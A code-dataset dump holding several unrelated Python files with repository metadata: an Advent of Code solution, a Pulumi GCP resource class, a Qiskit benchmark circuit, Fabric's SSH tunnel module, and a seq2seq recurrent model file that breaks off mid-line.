9d23a9a2b1432fe22a146bd3e0193ea953b20eac
| 2,218
|
py
|
Python
|
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Advent of Code 2021 Day 3: Dive!
https://adventofcode.com/2021/day/3
Solution by Eric Colton
"""
import re
from typing import List
def parse_input_data(raw_input: List[str]) -> List[str]:
return [line.rstrip() for line in raw_input]
def convert_binary_to_decimal(binary_str: str) -> int:
rv = 0
for bit in binary_str:
rv *= 2
if bit == "1":
rv += 1
return rv
def calculate_gamma_epsilon(report: List[str]) -> tuple:
bit_counts = [0] * len(report[0])
for line in report:
for i, bit in enumerate(line):
if bit == "1":
bit_counts[i] += 1
elif bit != "0":
raise Exception("Expected only 1 or 0")
gamma, epsilon = "", ""
for count in bit_counts:
gamma += "1" if count > len(report) / 2 else "0"
epsilon += "0" if count > len(report) / 2 else "1"
return (convert_binary_to_decimal(gamma), convert_binary_to_decimal(epsilon))
def calculate_oxygen_co2(report: List[str], count_majority: bin) -> int:
filtered_report = report
for i in range(len(report[0])):
count = sum([1 if line[i] == "1" else 0 for line in filtered_report])
if count_majority:
filter_bit = "1" if count >= len(filtered_report) / 2 else "0"
else:
filter_bit = "0" if count >= len(filtered_report) / 2 else "1"
filtered_report = list(filter(lambda x: x[i] == filter_bit, filtered_report))
if len(filtered_report) == 1:
return convert_binary_to_decimal(filtered_report[0])
if __name__ == '__main__':
input_filename = __file__.strip('.py') + '_input.txt'
with open(input_filename, 'r') as file:
raw_input = file.readlines()
report = parse_input_data(raw_input)
(gamma, epsilon) = calculate_gamma_epsilon(report)
part_1 = gamma * epsilon
assert part_1 == 1307354
print(f"The solution to Part 1 is {part_1}")
oxygen = calculate_oxygen_co2(report, True)
co2 = calculate_oxygen_co2(report, False)
part_2 = oxygen * co2
assert part_2 == 482500
print(f"The solution to Part 2 is {part_2}")
| 33.606061
| 85
| 0.609107
|
ebd2bbedefdadc3fbe4e93fc0a90b5a0f54d0043
| 16,326
|
py
|
Python
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ResourcePolicyArgs', 'ResourcePolicy']
@pulumi.input_type
class ResourcePolicyArgs:
def __init__(__self__, *,
region: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']] = None,
instance_schedule_policy: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']] = None):
"""
The set of arguments for constructing a ResourcePolicy resource.
:param pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs'] group_placement_policy: Resource policy for instances for placement configuration.
:param pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs'] instance_schedule_policy: Resource policy for scheduling instance operations.
:param pulumi.Input[str] name: The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs'] snapshot_schedule_policy: Resource policy for persistent disks for creating snapshots.
"""
pulumi.set(__self__, "region", region)
if description is not None:
pulumi.set(__self__, "description", description)
if group_placement_policy is not None:
pulumi.set(__self__, "group_placement_policy", group_placement_policy)
if instance_schedule_policy is not None:
pulumi.set(__self__, "instance_schedule_policy", instance_schedule_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if request_id is not None:
pulumi.set(__self__, "request_id", request_id)
if snapshot_schedule_policy is not None:
pulumi.set(__self__, "snapshot_schedule_policy", snapshot_schedule_policy)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="groupPlacementPolicy")
def group_placement_policy(self) -> Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']]:
"""
Resource policy for instances for placement configuration.
"""
return pulumi.get(self, "group_placement_policy")
@group_placement_policy.setter
def group_placement_policy(self, value: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']]):
pulumi.set(self, "group_placement_policy", value)
@property
@pulumi.getter(name="instanceSchedulePolicy")
def instance_schedule_policy(self) -> Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']]:
"""
Resource policy for scheduling instance operations.
"""
return pulumi.get(self, "instance_schedule_policy")
@instance_schedule_policy.setter
def instance_schedule_policy(self, value: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']]):
pulumi.set(self, "instance_schedule_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="requestId")
def request_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "request_id")
@request_id.setter
def request_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_id", value)
@property
@pulumi.getter(name="snapshotSchedulePolicy")
def snapshot_schedule_policy(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']]:
"""
Resource policy for persistent disks for creating snapshots.
"""
return pulumi.get(self, "snapshot_schedule_policy")
@snapshot_schedule_policy.setter
def snapshot_schedule_policy(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']]):
pulumi.set(self, "snapshot_schedule_policy", value)
class ResourcePolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']]] = None,
instance_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']]] = None,
__props__=None):
"""
Creates a new resource policy.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']] group_placement_policy: Resource policy for instances for placement configuration.
:param pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']] instance_schedule_policy: Resource policy for scheduling instance operations.
:param pulumi.Input[str] name: The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']] snapshot_schedule_policy: Resource policy for persistent disks for creating snapshots.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResourcePolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Creates a new resource policy.
:param str resource_name: The name of the resource.
:param ResourcePolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourcePolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']]] = None,
instance_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourcePolicyArgs.__new__(ResourcePolicyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["group_placement_policy"] = group_placement_policy
__props__.__dict__["instance_schedule_policy"] = instance_schedule_policy
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["request_id"] = request_id
__props__.__dict__["snapshot_schedule_policy"] = snapshot_schedule_policy
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["resource_status"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["status"] = None
super(ResourcePolicy, __self__).__init__(
'google-native:compute/beta:ResourcePolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ResourcePolicy':
"""
Get an existing ResourcePolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ResourcePolicyArgs.__new__(ResourcePolicyArgs)
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["description"] = None
__props__.__dict__["group_placement_policy"] = None
__props__.__dict__["instance_schedule_policy"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["region"] = None
__props__.__dict__["resource_status"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["snapshot_schedule_policy"] = None
__props__.__dict__["status"] = None
return ResourcePolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
return pulumi.get(self, "description")
@property
@pulumi.getter(name="groupPlacementPolicy")
def group_placement_policy(self) -> pulumi.Output['outputs.ResourcePolicyGroupPlacementPolicyResponse']:
"""
Resource policy for instances for placement configuration.
"""
return pulumi.get(self, "group_placement_policy")
@property
@pulumi.getter(name="instanceSchedulePolicy")
def instance_schedule_policy(self) -> pulumi.Output['outputs.ResourcePolicyInstanceSchedulePolicyResponse']:
"""
Resource policy for scheduling instance operations.
"""
return pulumi.get(self, "instance_schedule_policy")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Type of the resource. Always compute#resource_policies for resource policies.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
return pulumi.get(self, "region")
@property
@pulumi.getter(name="resourceStatus")
def resource_status(self) -> pulumi.Output['outputs.ResourcePolicyResourceStatusResponse']:
"""
The system status of the resource policy.
"""
return pulumi.get(self, "resource_status")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
Server-defined fully-qualified URL for this resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="snapshotSchedulePolicy")
def snapshot_schedule_policy(self) -> pulumi.Output['outputs.ResourcePolicySnapshotSchedulePolicyResponse']:
"""
Resource policy for persistent disks for creating snapshots.
"""
return pulumi.get(self, "snapshot_schedule_policy")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of resource policy creation.
"""
return pulumi.get(self, "status")
| 48.734328
| 496
| 0.680081
|
fbb04d06fc0062da7a3a7e1b47bcb59a8a4a238b
| 4,222
|
py
|
Python
|
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=4
# total number=38
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=30
prog.cz(input_qubit[0],input_qubit[3]) # number=31
prog.h(input_qubit[3]) # number=32
prog.cx(input_qubit[0],input_qubit[3]) # number=33
prog.x(input_qubit[3]) # number=34
prog.cx(input_qubit[0],input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=29
prog.h(input_qubit[1]) # number=2
prog.z(input_qubit[2]) # number=36
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[2]) # number=37
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
prog.cx(input_qubit[1],input_qubit[0]) # number=13
prog.h(input_qubit[0]) # number=15
prog.cz(input_qubit[1],input_qubit[0]) # number=16
prog.h(input_qubit[1]) # number=20
prog.h(input_qubit[2]) # number=19
prog.cx(input_qubit[3],input_qubit[0]) # number=24
prog.z(input_qubit[3]) # number=25
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.h(input_qubit[0]) # number=17
prog.cx(input_qubit[2],input_qubit[0]) # number=21
prog.x(input_qubit[1]) # number=23
prog.cx(input_qubit[2],input_qubit[0]) # number=22
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = FakeVigo()
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy3091.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 34.606557
| 140
| 0.653482
|
a19d47641c73b3d95d58f5d189c52a88e024dd0c
| 5,677
|
py
|
Python
|
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Tunnel and connection forwarding internals.
If you're looking for simple, end-user-focused connection forwarding, please
see `.Connection`, e.g. `.Connection.forward_local`.
"""
import errno
import select
import socket
import time
from threading import Event
from invoke.exceptions import ThreadException
from invoke.util import ExceptionHandlingThread
class TunnelManager(ExceptionHandlingThread):
"""
Thread subclass for tunnelling connections over SSH between two endpoints.
Specifically, one instance of this class is sufficient to sit around
forwarding any number of individual connections made to one end of the
tunnel or the other. If you need to forward connections between more than
one set of ports, you'll end up instantiating multiple TunnelManagers.
Wraps a `~paramiko.transport.Transport`, which should already be connected
to the remote server.
.. versionadded:: 2.0
"""
def __init__(
self,
local_host,
local_port,
remote_host,
remote_port,
transport,
finished,
):
super(TunnelManager, self).__init__()
self.local_address = (local_host, local_port)
self.remote_address = (remote_host, remote_port)
self.transport = transport
self.finished = finished
def _run(self):
# Track each tunnel that gets opened during our lifetime
tunnels = []
# Set up OS-level listener socket on forwarded port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# TODO: why do we want REUSEADDR exactly? and is it portable?
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# NOTE: choosing to deal with nonblocking semantics and a fast loop,
# versus an older approach which blocks & expects outer scope to cause
# a socket exception by close()ing the socket.
sock.setblocking(0)
sock.bind(self.local_address)
sock.listen(1)
while not self.finished.is_set():
# Main loop-wait: accept connections on the local listener
# NOTE: EAGAIN means "you're nonblocking and nobody happened to
# connect at this point in time"
try:
tun_sock, local_addr = sock.accept()
# Set TCP_NODELAY to match OpenSSH's forwarding socket behavior
tun_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except socket.error as e:
if e.errno is errno.EAGAIN:
# TODO: make configurable
time.sleep(0.01)
continue
raise
# Set up direct-tcpip channel on server end
# TODO: refactor w/ what's used for gateways
channel = self.transport.open_channel(
"direct-tcpip", self.remote_address, local_addr
)
# Set up 'worker' thread for this specific connection to our
# tunnel, plus its dedicated signal event (which will appear as a
# public attr, no need to track both independently).
finished = Event()
tunnel = Tunnel(channel=channel, sock=tun_sock, finished=finished)
tunnel.start()
tunnels.append(tunnel)
exceptions = []
# Propogate shutdown signal to all tunnels & wait for closure
# TODO: would be nice to have some output or at least logging here,
# especially for "sets up a handful of tunnels" use cases like
# forwarding nontrivial HTTP traffic.
for tunnel in tunnels:
tunnel.finished.set()
tunnel.join()
wrapper = tunnel.exception()
if wrapper:
exceptions.append(wrapper)
# Handle exceptions
if exceptions:
raise ThreadException(exceptions)
# All we have left to close is our own sock.
# TODO: use try/finally?
sock.close()
class Tunnel(ExceptionHandlingThread):
"""
Bidirectionally forward data between an SSH channel and local socket.
.. versionadded:: 2.0
"""
def __init__(self, channel, sock, finished):
self.channel = channel
self.sock = sock
self.finished = finished
self.socket_chunk_size = 1024
self.channel_chunk_size = 1024
super(Tunnel, self).__init__()
def _run(self):
try:
empty_sock, empty_chan = None, None
while not self.finished.is_set():
r, w, x = select.select([self.sock, self.channel], [], [], 1)
if self.sock in r:
empty_sock = self.read_and_write(
self.sock, self.channel, self.socket_chunk_size
)
if self.channel in r:
empty_chan = self.read_and_write(
self.channel, self.sock, self.channel_chunk_size
)
if empty_sock or empty_chan:
break
finally:
self.channel.close()
self.sock.close()
def read_and_write(self, reader, writer, chunk_size):
"""
Read ``chunk_size`` from ``reader``, writing result to ``writer``.
Returns ``None`` if successful, or ``True`` if the read was empty.
.. versionadded:: 2.0
"""
data = reader.recv(chunk_size)
if len(data) == 0:
return True
writer.sendall(data)
| 35.93038
| 80
| 0.589044
|
c48225cd7e2f181c1e395269c6d28ef9e4d62454
| 574
|
py
|
Python
|
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | null | null | null |
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | 13
|
2021-01-21T14:35:29.000Z
|
2021-09-01T07:53:27.000Z
|
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | 4
|
2021-02-23T18:17:35.000Z
|
2021-07-23T14:54:13.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CESNET.
#
# CESNET OA Publication Repository is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
#
"""Mappings.
Mappings define how records and their fields will be indexed in Elasticsearch.
The provided publications-object-v1.0.0.json file is an example of how to index records
in Elasticsearch. You need to provide one mapping per major version of
Elasticsearch you want to support.
"""
from __future__ import absolute_import, print_function
| 31.888889
| 93
| 0.771777
|
caa86c6d5e4874b344d7dd92209b75f5f89ec574
| 10,363
|
py
|
Python
|
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | null | null | null |
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | null | null | null |
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | 1
|
2021-01-07T10:37:31.000Z
|
2021-01-07T10:37:31.000Z
|
# Partially adapted from https://github.com/OpenNMT/OpenNMT-py
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import PackedSequence
from .seq2seq import Seq2Seq
from .attention import GlobalAttention
def bridge_bidirectional_hidden(hidden):
# the bidirectional hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
num_layers = hidden.size(0) // 2
batch_size, hidden_size = hidden.size(1), hidden.size(2)
return hidden.view(num_layers, 2, batch_size, hidden_size) \
.transpose(1, 2).contiguous() \
.view(num_layers, batch_size, hidden_size * 2)
class RecurrentEncoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False, rnn=nn.LSTM):
super(RecurrentEncoder, self).__init__()
self.layers = num_layers
self.bidirectional = bidirectional
self.hidden_size = hidden_size
embedding_size = hidden_size
if bidirectional:
assert hidden_size % 2 == 0
self.hidden_size = hidden_size // 2
self.embedder = nn.Embedding(vocab_size,
embedding_size,
padding_idx=0)
self.rnn = rnn(embedding_size, self.hidden_size,
num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, bidirectional=bidirectional)
def forward(self, inputs, hidden=None):
if isinstance(inputs, tuple):
# Lengths data is wrapped inside a Variable.
lengths = inputs[1].data.view(-1).tolist()
emb = pack(self.embedder(inputs[0]), lengths)
else:
emb = self.embedder(inputs)
outputs, hidden_t = self.rnn(emb, hidden)
if isinstance(inputs, tuple):
outputs = unpack(outputs)[0]
return outputs, hidden_t
class RecurrentDecoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, rnn=nn.LSTM, tie_embedding=True):
super(RecurrentDecoder, self).__init__()
self.layers = num_layers
self.hidden_size = hidden_size
embedding_size = hidden_size
self.embedder = nn.Embedding(vocab_size,
embedding_size,
padding_idx=0)
self.rnn = rnn(embedding_size, self.hidden_size,
num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, bidirectional=False)
self.classifier = nn.Linear(hidden_size, vocab_size)
if tie_embedding:
self.classifier.weight = self.embedder.weight
def forward(self, inputs, hidden=None):
if isinstance(inputs, tuple):
# Lengths data is wrapped inside a Variable.
lengths = inputs[1].data.view(-1).tolist()
emb = pack(self.embedder(inputs[0]), lengths)
else:
emb = self.embedder(inputs)
x, hidden_t = self.rnn(emb, hidden)
if isinstance(inputs, tuple):
x = unpack(x)[0]
x = x.view(-1, x.size(2))
x = self.classifier(x)
x = x.view(inputs.size(0), inputs.size(1), -1)
return x, hidden_t
class StackedRecurrentCells(nn.Module):
def __init__(self, input_size, hidden_size, num_layers=1,
dropout=0, bias=True, batch_first=False, rnn_cell=nn.LSTMCell):
super(StackedRecurrentCells, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.hidden_size = hidden_size
self.layers = nn.ModuleList()
for _ in range(num_layers):
self.layers.append(rnn_cell(input_size, hidden_size, bias=bias))
input_size = hidden_size
def forward(self, inputs, hidden=None):
def select_layer(h_state, i): # To work on both LSTM / GRU, RNN
if isinstance(h_state, tuple):
return tuple([select_layer(s, i) for s in h_state])
else:
return h_state[i]
if hidden is None:
zeros = inputs.data.new(
self.num_layers, inputs.size(0), self.hidden_size).zero_()
if isinstance(self.layers[0], nn.LSTMCell):
hidden = (Variable(zeros, requires_grad=False),
Variable(zeros, requires_grad=False))
else:
hidden = Variable(zeros, requires_grad=False)
next_hidden = []
for i, layer in enumerate(self.layers):
next_hidden_i = layer(inputs, select_layer(hidden, i))
inputs = next_hidden_i[0] if isinstance(next_hidden_i, tuple) \
else next_hidden_i
if i + 1 != self.num_layers:
inputs = self.dropout(inputs)
next_hidden.append(next_hidden_i)
if isinstance(hidden, tuple):
next_hidden = tuple([torch.stack(h) for h in zip(*next_hidden)])
else:
next_hidden = torch.stack(next_hidden)
return inputs, next_hidden
class RecurrentAttention(nn.Module):
def __init__(self, input_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False, context_size=None,
dropout=0, rnn_cell=nn.LSTMCell, attention=GlobalAttention):
super(RecurrentAttention, self).__init__()
self.layers = num_layers
self.rnn = StackedRecurrentCells(input_size, hidden_size,
